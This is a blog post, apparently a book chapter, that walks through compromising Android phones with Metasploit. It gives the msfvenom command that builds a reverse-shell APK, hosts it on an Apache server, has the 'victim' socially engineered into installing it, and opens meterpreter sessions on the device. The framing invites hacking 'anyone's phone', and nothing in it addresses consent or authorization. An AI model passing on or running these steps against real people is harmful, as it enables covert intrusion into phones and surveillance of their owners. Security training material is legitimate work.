Hello everyone,
I am Nitin yadav(KD) back again with another write-up
So this article is a chapter from one of my book which I am writing so enjoy reading it.
Do you want to be able to hack any phone? If so, this article is for you. In this article, we will be discussing the basics of hacking phones with a tool named Metasploit, and how to get started.
Phones are essentially computers in the form of a phone. They use the same basic components like computers, such as processors, memory, and storage devices.
Most phones use a central processing unit (CPU), which is the brain of the phone. The CPU is responsible for running the operating system (OS), all of the applications, and all of the users.
Every mobile phone user has a good feeling about themselves and thinks that no one can hack their phones. Well, let me break this myth right now because "all it takes is just a working computer, an internet connection, and a mobile phone to hack anyone's phone."
If you are a beginner in ethical hacking, then before starting to hack mobile phones or software, you must know what is Metasploit and how to use this tool.
What is the Metasploit framework?
Metasploit is the world's most used penetration testing framework which enables you to find, exploit, and validate vulnerabilities. With Metasploit, you have highly easy-to-use and effective exploits, delivered by a friendly interface. It is developed by Rapid7 and is the most preferred framework for penetration testing.
How can you hack a phone remotely?
In this article, we are going to exploit mobile phones that is an android devices. Using the Metasploit framework and a payload is generated for android devices which can be delivered to the victim’s mobile using social engineering attack vectors.
Generate the Payload
Fire up the Kali Linux, so that we may generate an apk file as a malicious payload. Now let’s check our local IP address by opening a terminal and typing ifconfig there:
After getting the IP address use msfvenom tool that will generate a payload to penetrate the Android device.
For that use:
msfvenom –p android/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 R> ehacking.apk
Here
-p indicates a payload type
android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
LHOST is your local IP
LPORT is set to be as a listening port
R > ehacking.apk would give the output
Apk is the final name of the final output
This process will take a little time to generate an apk file.
Now as you have made the apk we have to move this apk file to Apache server and for that use the following command:
sudo mv ehacking.apk /var/www/html
And the apk will move to the Apache server and now you can access that apk from anywhere.
Launching the attack
Before launching an attack, we need to check the status of the Apache server.
So type the command
service apache2 status
Now that everything is ready, fire up MSF console.
Use multi/handler exploit, set payload the same as generated previously, set LHOST and LPORT values same as used in payload, and finally type exploit to launch an attack as shown in the screenshot.
Now for downloading the apk on any android device use
Your_IP_ADDRESS/ehacking.apk
After downloading install it to your victim's device.
Once the user installs the application and runs it, the meterepreter session would be opened immediately at the attacking side.
Exploitation
Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.
Now you can type and see your session id
sessions
And now you can do is you can interact with that device by using
sessions -I [session ID]
Now type hep and a list of commands will be shown
And you have successfully hacked a mobile phone.
I hope you enjoy this one and I see you next time ;)
Take care and happy hacking!
Comments